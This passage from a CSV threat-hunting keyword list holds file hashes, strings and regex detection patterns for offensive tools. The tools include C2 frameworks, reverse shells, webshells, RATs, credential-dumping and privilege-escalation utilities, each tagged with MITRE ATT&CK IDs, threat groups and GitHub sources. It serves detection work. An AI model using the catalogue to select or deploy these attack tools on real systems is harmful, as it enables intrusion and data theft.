#linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","21992" "*11d8e391f72c4950369727c3bb5071ecb806326d1631556183d7ac403e128d97*",".{0,1000}11d8e391f72c4950369727c3bb5071ecb806326d1631556183d7ac403e128d97.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","21994" "*11db72b2a60d5be74d95f4a311571f045086efef145562edf02046d97f44f975*",".{0,1000}11db72b2a60d5be74d95f4a311571f045086efef145562edf02046d97f44f975.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","21995" "*11ddcce3f411ffc78725cd4487998eb819324a19a502cd86852c9d8e2cc9659d*",".{0,1000}11ddcce3f411ffc78725cd4487998eb819324a19a502cd86852c9d8e2cc9659d.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","#filehash","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","21996" 
"*11eebffcb6a3eb53339bb8e36b8962e7998c596338be5ff8ebf73e46753ca393*",".{0,1000}11eebffcb6a3eb53339bb8e36b8962e7998c596338be5ff8ebf73e46753ca393.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","21997" "*11ef63b9bc33b0da6d0b5593e55e460aa8aa8279eb9ad4b90a4dc2b722ffa6e1*",".{0,1000}11ef63b9bc33b0da6d0b5593e55e460aa8aa8279eb9ad4b90a4dc2b722ffa6e1.{0,1000}","offensive_tool_keyword","impacketremoteshell","install a legit application and interface with it over smb w/o the signature of cmd.exe / powershell.exe being called or the redirection typically used by those techniques","T1077 - T1059.007 - T1569.001","TA0008 - TA0005 - TA0040","N/A","N/A","Lateral Movement","https://github.com/trustedsec/The_Shelf","1","0","#filehash","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","21998" "*11f50c95d4dbcd97d5c76753aa7bc38bb615295f553a4c989015176ac0fa3be3*",".{0,1000}11f50c95d4dbcd97d5c76753aa7bc38bb615295f553a4c989015176ac0fa3be3.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","22001" "*11f51e1a8f1a630390533599cfbcb78133d680f6*",".{0,1000}11f51e1a8f1a630390533599cfbcb78133d680f6.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","22002" "*11f78d1a820ec352029004223dc0de3470f7b9f8850b3bda75854a34b2551811*",".{0,1000}11f78d1a820ec352029004223dc0de3470f7b9f8850b3bda75854a34b2551811.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/gsmith257-cyber/better-sliver","1","0","#filehash","N/A","10","10","98","10","2024-07-22T12:32:16Z","2023-12-12T02:04:36Z","22004" "*11f87919942c811549a9c15b8647d26639becdc0feb75c43c87aa542d64e0552*",".{0,1000}11f87919942c811549a9c15b8647d26639becdc0feb75c43c87aa542d64e0552.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER 
BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","22005" "*11fcbd067d55ddaa11e622be03a55ea342efe497cbcb14abf4dc410cb5d7a203*",".{0,1000}11fcbd067d55ddaa11e622be03a55ea342efe497cbcb14abf4dc410cb5d7a203.{0,1000}","offensive_tool_keyword","tricky.lnk","VBS that creates a .lnk file spoofing the file extension with unicode chars that reverses the .lnk file extension. appends .txt to the end and changes the icon to notepad to make it appear as a textfile. When executed. the payload is a powershell webdl and execute","T1027 - T1036 - T1218.010","TA0002 - TA0003 - TA0008","N/A","N/A","Phishing","https://github.com/xillwillx/tricky.lnk","1","0","#filehash","N/A","N/A","2","114","33","2020-12-19T23:42:10Z","2016-10-26T21:25:06Z","22006" "*12019e8fbf5e9de4d96c87be2e5e160fc2e51faef14a3fe68561523858ab6511*",".{0,1000}12019e8fbf5e9de4d96c87be2e5e160fc2e51faef14a3fe68561523858ab6511.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","22007" "*12049959488b4cd94238371564597e57b04fcab7a194972b6c66f1ee1fc8ad2d*",".{0,1000}12049959488b4cd94238371564597e57b04fcab7a194972b6c66f1ee1fc8ad2d.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","22008" 
"*120ebb7f608e411010824805482f682059e9089a8c8a0ca44ff48e69f8ebd64b*",".{0,1000}120ebb7f608e411010824805482f682059e9089a8c8a0ca44ff48e69f8ebd64b.{0,1000}","offensive_tool_keyword","cliws","Cross platform interactive bind/reverse PTY shell","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://github.com/b23r0/cliws","1","0","#filehash","N/A","10","10","159","29","2023-11-06T02:19:16Z","2021-10-24T04:10:07Z","22010" "*120edd37142c24d17472137c608220220a4efb595d42a991efd498ac30339b4e*",".{0,1000}120edd37142c24d17472137c608220220a4efb595d42a991efd498ac30339b4e.{0,1000}","offensive_tool_keyword","Carbanak","remote backdoor used by a group of the same name (Carbanak). It is intended for espionage - data exfiltration and providing remote access to infected machines","T1021.002 - T1071.001 - T1105 - T1059 - T1003 - T1078 - T1041","TA0006 - TA0008 - TA0010 - TA0011","Carbanak","FIN7 - Carbanak","Malware","https://github.com/0x25bit/Updated-Carbanak-Source-with-Plugins","1","0","#filehash","N/A","10","4","396","223","2019-05-01T23:31:35Z","2019-04-22T21:01:08Z","22011" "*12139d47846b3be4267cb079cd73db336c938f111880e23a2f21d19b75921c7b*",".{0,1000}12139d47846b3be4267cb079cd73db336c938f111880e23a2f21d19b75921c7b.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#filehash","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","22013" "*121a8382a9b50c51ffe0269efc4db9fafee9cb7dc1afe5ea5318b2d2439b22c7*",".{0,1000}121a8382a9b50c51ffe0269efc4db9fafee9cb7dc1afe5ea5318b2d2439b22c7.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS 
Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","22016" "*121b6cc756d066cd5581f54215db3faf5edb5ff02697421cd38b6f93d6d5d65b*",".{0,1000}121b6cc756d066cd5581f54215db3faf5edb5ff02697421cd38b6f93d6d5d65b.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","22017" "*121e18a8ad050f1a9510c6c32c0f4bb9adac3436170e2d1966788da4dc14c751*",".{0,1000}121e18a8ad050f1a9510c6c32c0f4bb9adac3436170e2d1966788da4dc14c751.{0,1000}","offensive_tool_keyword","Discord-RAT-2.0","Discord Remote Administration Tool fully written in c#, stub size of ~75kb with over 40 post exploitations modules","T1059.005 - T1105 - T1569.002 - T1027.001","TA0011 - TA0003 - TA0006 - TA0009 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/moom825/Discord-RAT-2.0","1","0","#filehash","N/A","10","10","512","115","2023-11-03T01:15:38Z","2022-07-15T20:09:56Z","22018" "*1227072f7b3532300b6c991a88b1faaa472cd0cc214d0c2b5f2ae3dec5c2f922*",".{0,1000}1227072f7b3532300b6c991a88b1faaa472cd0cc214d0c2b5f2ae3dec5c2f922.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense 
Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","22020" "*1228965bfca9be58b2370874d794ce293238ef8a7faa1f6c744374300aa8a79d*",".{0,1000}1228965bfca9be58b2370874d794ce293238ef8a7faa1f6c744374300aa8a79d.{0,1000}","offensive_tool_keyword","TeamsEnum","User Enumeration of Microsoft Teams users via API","T1589.002 - T1590","TA0007 - TA0001","N/A","Black Basta","Discovery","https://github.com/sse-secure-systems/TeamsEnum","1","0","#filehash","N/A","6","2","153","21","2024-03-27T18:14:25Z","2023-04-03T18:35:15Z","22021" "*123abcbde966780cef8d9ec24523acac*",".{0,1000}123abcbde966780cef8d9ec24523acac.{0,1000}","offensive_tool_keyword","NimExec","Fileless Command Execution for Lateral Movement in Nim","T1021.006 - T1059.005 - T1564.001","TA0008 - TA0002 - TA0040","N/A","N/A","Exploitation tool","https://github.com/frkngksl/NimExec","1","0","N/A","N/A","N/A","4","372","38","2023-12-12T06:59:59Z","2023-04-21T19:46:53Z","22024" "*12478b22d1d04c87d681a635c8e31745119c25d50bf344f6ed9d8a4cb65e96c5*",".{0,1000}12478b22d1d04c87d681a635c8e31745119c25d50bf344f6ed9d8a4cb65e96c5.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","22026" "*124e6ada27ffbe0ff97f51eb9d7caaf86b531bcff90ed5a075ff89b45b00cba5*",".{0,1000}124e6ada27ffbe0ff97f51eb9d7caaf86b531bcff90ed5a075ff89b45b00cba5.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense 
Evasion","https://github.com/hfiref0x/WDExtract/","1","0","#filehash","N/A","8","5","440","61","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z","22027" "*1250BAE1-D26F-4EF2-9452-9B5009568336*",".{0,1000}1250BAE1\-D26F\-4EF2\-9452\-9B5009568336.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","0","#GUIDproject","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","22028" "*12545d5c24427a6dc3e63d63472bb344ad1d67f323756f1430b48ae2acdf322d*",".{0,1000}12545d5c24427a6dc3e63d63472bb344ad1d67f323756f1430b48ae2acdf322d.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","22030" "*1256b5cd8907a87eaeb5990075115f93058f4779f348718f7ebf3958a006ecdf*",".{0,1000}1256b5cd8907a87eaeb5990075115f93058f4779f348718f7ebf3958a006ecdf.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","22031" "*1257077a68f9725d863947e0931a44727fceaad6565b73b9f8d873cc3d028e00*",".{0,1000}1257077a68f9725d863947e0931a44727fceaad6565b73b9f8d873cc3d028e00.{0,1000}","offensive_tool_keyword","KeyCredentialLink","Add Shadow Credentials to a target object by editing their msDS-KeyCredentialLink attribute","T1098 - T1550","TA0006 - TA0008","N/A","N/A","Credential 
Access","https://github.com/Leo4j/KeyCredentialLink","1","0","#filehash","N/A","10","1","21","3","2024-06-05T13:44:39Z","2024-06-05T13:19:49Z","22032" "*125d5bee94f4a04a39b54ec1bcccb5256e0f34abc0ac991af803b1dc525cfbd7*",".{0,1000}125d5bee94f4a04a39b54ec1bcccb5256e0f34abc0ac991af803b1dc525cfbd7.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","22033" "*125d8d5718d5ac71f5548f2961980df14595e230c66a5fceada29a7f74af340b*",".{0,1000}125d8d5718d5ac71f5548f2961980df14595e230c66a5fceada29a7f74af340b.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","22034" "*125dadd033118d08acc7a70074c1174e99353c1634083609a27c11d7a4131a56*",".{0,1000}125dadd033118d08acc7a70074c1174e99353c1634083609a27c11d7a4131a56.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 
- T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","22035" "*127.0.0.1 is not advisable as a source. Use -l 127.0.0.1 to override this warning*",".{0,1000}127\.0\.0\.1\sis\snot\sadvisable\sas\sa\ssource\.\sUse\s\-l\s127\.0\.0\.1\sto\soverride\sthis\swarning.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file noclient CNC server for NOPEN*","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tool","https://github.com/x0rz/EQGRP/blob/master/Linux/bin/noclient-3.3.2.3-linux-i386","1","0","N/A","N/A","N/A","10","4124","2071","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z","22037" "*127.0.0.1/backdoored*",".{0,1000}127\.0\.0\.1\/backdoored.{0,1000}","offensive_tool_keyword","PhpSploit","Full-featured C2 framework which silently persists on webserver via evil PHP oneliner","T1505.003 - T1505 - T1059 - T1219 - T1547","TA0003 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/nil0x42/phpsploit","1","0","N/A","N/A","10","10","2331","453","2024-05-06T13:49:14Z","2014-05-21T19:43:03Z","22038" "*127.0.0.1/C$/Windows/System32/utilman.exe*",".{0,1000}127\.0\.0\.1\/C\$\/Windows\/System32\/utilman\.exe.{0,1000}","offensive_tool_keyword","potato","Potato Privilege Escalation on Windows","T1134.001 - T1068 - T1055 - T1546.015","TA0004","N/A","N/A","Privilege Escalation","https://github.com/foxglovesec/Potato","1","0","#content","N/A","7","8","721","165","2021-01-16T20:34:04Z","2016-02-09T11:28:17Z","22039" "*127.0.0.1/KingDefacer*",".{0,1000}127\.0\.0\.1\/KingDefacer.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","22040" "*127.0.0.1/pipe/coerced\\C$*",".{0,1000}127\.0\.0\.1\/pipe\/coerced\\\\C\$.{0,1000}","offensive_tool_keyword","CoercedPotato","CoercedPotato From Patate (LOCAL/NETWORK SERVICE) to SYSTEM by abusing SeImpersonatePrivilege on Windows 10 Windows 11 and Server 2022.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Prepouce/CoercedPotato","1","0","N/A","N/A","10","4","366","66","2024-08-26T08:09:00Z","2023-09-11T19:04:29Z","22041" "*127.0.0.1/r57shell*",".{0,1000}127\.0\.0\.1\/r57shell.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","22042" "*127.0.0.1:#{mitm_port}*",".{0,1000}127\.0\.0\.1\:\#\{mitm_port\}.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","N/A","9","2","172","96","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z","22043" "*127.0.0.1:1080*",".{0,1000}127\.0\.0\.1\:1080.{0,1000}","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","AvosLocker - LockBit","C2","https://github.com/sysdream/ligolo","1","0","N/A","N/A","10","10","1764","224","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z","22044" "*127.0.0.1:1337*",".{0,1000}127\.0\.0\.1\:1337.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 
C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use them with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","N/A","10","10","220","40","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z","22045" "*127.0.0.1:1337*",".{0,1000}127\.0\.0\.1\:1337.{0,1000}","offensive_tool_keyword","Lastenzug","Socks4a proxy based on websockets","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://github.com/codewhitesec/Lastenzug","1","1","N/A","N/A","10","10","218","33","2022-10-18T08:55:46Z","2022-07-21T12:57:52Z","22046" "*127.0.0.1:2222*",".{0,1000}127\.0\.0\.1\:2222.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). 
This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","N/A","10","10","443","95","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z","22047" "*127.0.0.1:31337*",".{0,1000}127\.0\.0\.1\:31337.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","22048" "*127.0.0.1:4567*",".{0,1000}127\.0\.0\.1\:4567.{0,1000}","offensive_tool_keyword","primusC2","another C2 framework","T1090 - T1071","TA0011 - TA0002","N/A","N/A","C2","https://github.com/Primusinterp/PrimusC2","1","1","N/A","N/A","10","10","55","4","2024-11-01T00:20:02Z","2023-04-19T10:59:30Z","22049" "*127.0.0.1:53531*",".{0,1000}127\.0\.0\.1\:53531.{0,1000}","offensive_tool_keyword","dnscat","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","EMBER BEAR","C2","https://github.com/iagox86/dnscat2","1","1","N/A","N/A","10","10","3566","618","2024-03-14T11:17:49Z","2013-01-04T23:15:55Z","22050" "*127.0.0.1:5555*",".{0,1000}127\.0\.0\.1\:5555.{0,1000}","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","AvosLocker - LockBit","C2","https://github.com/sysdream/ligolo","1","0","N/A","N/A","10","10","1764","224","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z","22051" "*127.0.0.1:7777*",".{0,1000}127\.0\.0\.1\:7777.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control 
(C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","1","N/A","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","22052" "*127.0.0.1:8022*",".{0,1000}127\.0\.0\.1\:8022.{0,1000}","offensive_tool_keyword","MaccaroniC2","A proof-of-concept Command & Control framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration.","T1090 - T1059.003","TA0011 - TA0002","N/A","N/A","C2","https://github.com/CalfCrusher/MaccaroniC2","1","1","N/A","N/A","10","10","76","16","2023-06-27T17:43:59Z","2023-05-21T13:33:48Z","22053" "*127.0.0.1:8118*",".{0,1000}127\.0\.0\.1\:8118\:8118.{0,1000}","offensive_tool_keyword","CursedChrome","Chrome-extension implant that turns victim Chrome browsers into fully-functional HTTP proxies allowing you to browse sites as your victims","T1176 - T1219 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/mandatoryprogrammer/CursedChrome","1","1","N/A","privproxy port also web panel for victims","10","10","1533","226","2024-10-26T19:06:54Z","2020-04-26T20:55:05Z","22054" "*127.0.0.1:8848*",".{0,1000}127\.0\.0\.1\:8848.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","1","N/A","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","22055" "*127.0.0.1:9050*",".{0,1000}127\.0\.0\.1\:9050.{0,1000}","offensive_tool_keyword","MaccaroniC2","A proof-of-concept Command & Control framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration.","T1090 - 
T1059.003","TA0011 - TA0002","N/A","N/A","C2","https://github.com/CalfCrusher/MaccaroniC2","1","1","N/A","N/A","10","10","76","16","2023-06-27T17:43:59Z","2023-05-21T13:33:48Z","22056" "*127.0.0.1:9050*",".{0,1000}127\.0\.0\.1\:9050.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","N/A","Dispossessor - APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A","22057" "*1270518f941a14c009fc80622178f1713c7bacb88ee0396e0d858454f04cff63*",".{0,1000}1270518f941a14c009fc80622178f1713c7bacb88ee0396e0d858454f04cff63.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","22058" "*127449a2c9bac7f318aaf2ea709c7006875ddb4be79448f3f02db624e15a6540*",".{0,1000}127449a2c9bac7f318aaf2ea709c7006875ddb4be79448f3f02db624e15a6540.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","22059" "*127a7893890a5bbe661beaab8ecd27a565ef636c890cec15544480836f161a94*",".{0,1000}127a7893890a5bbe661beaab8ecd27a565ef636c890cec15544480836f161a94.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - 
